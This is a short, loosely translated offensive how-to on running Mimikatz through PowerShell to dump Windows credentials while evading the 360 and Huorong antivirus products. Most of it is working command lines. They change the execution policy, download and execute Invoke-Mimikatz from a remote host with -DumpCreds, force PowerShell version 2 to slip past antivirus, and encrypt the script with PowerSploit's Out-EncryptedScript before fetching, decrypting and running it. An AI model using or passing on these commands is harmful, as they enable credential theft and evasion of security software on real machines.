Some of the words
From a practical point of view, solve the practical problems encountered, simple record, can bypass 360 and HuoRongIntroduction
According to PowerShell's default policy, ps1 scripts are not allowed to execute
Get-executionpolicy indicates that the current policy is Restricted
You can change the execution policy with the administrator permission. Do not ask me why I have the administrator permission. You can not catch passwords with the normal user
Set-ExecutionPolicy Unrestricted
Actual use
PSV2
as we all known the easy way like this
powershell -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.1:8888/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
now you can use the v2 maybe can bypass some av like this
powershell -Version 2 -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.1:8888/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
Encode script
as we all know the Powersploit project, how about use this project to bypass?
Here we use the out-encryptedScript to place the script in the same directory as the MimiKatz script, and then encrypt it in turn
Import-Module .\Out-EncryptedScript.ps1
Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password woshijiamide -Salt safety
```
let our ps1script up to our tar then like this
powershell.exe
IEX(New-Object Net.WebClient).DownloadString("http://192.168.159.1:8888/Out-EncryptedScript.ps1")
[String] $cmd = Get-Content .\new1.ps1
Invoke-Expression $cmd
$decrypted = de woshijiamide safety
Invoke-Expression $decrypted
Invoke-Mimikatz
the same way, Of course, both files are put remote, also does not affect the final effect
maybe will get some wrong, but we also can catch PW
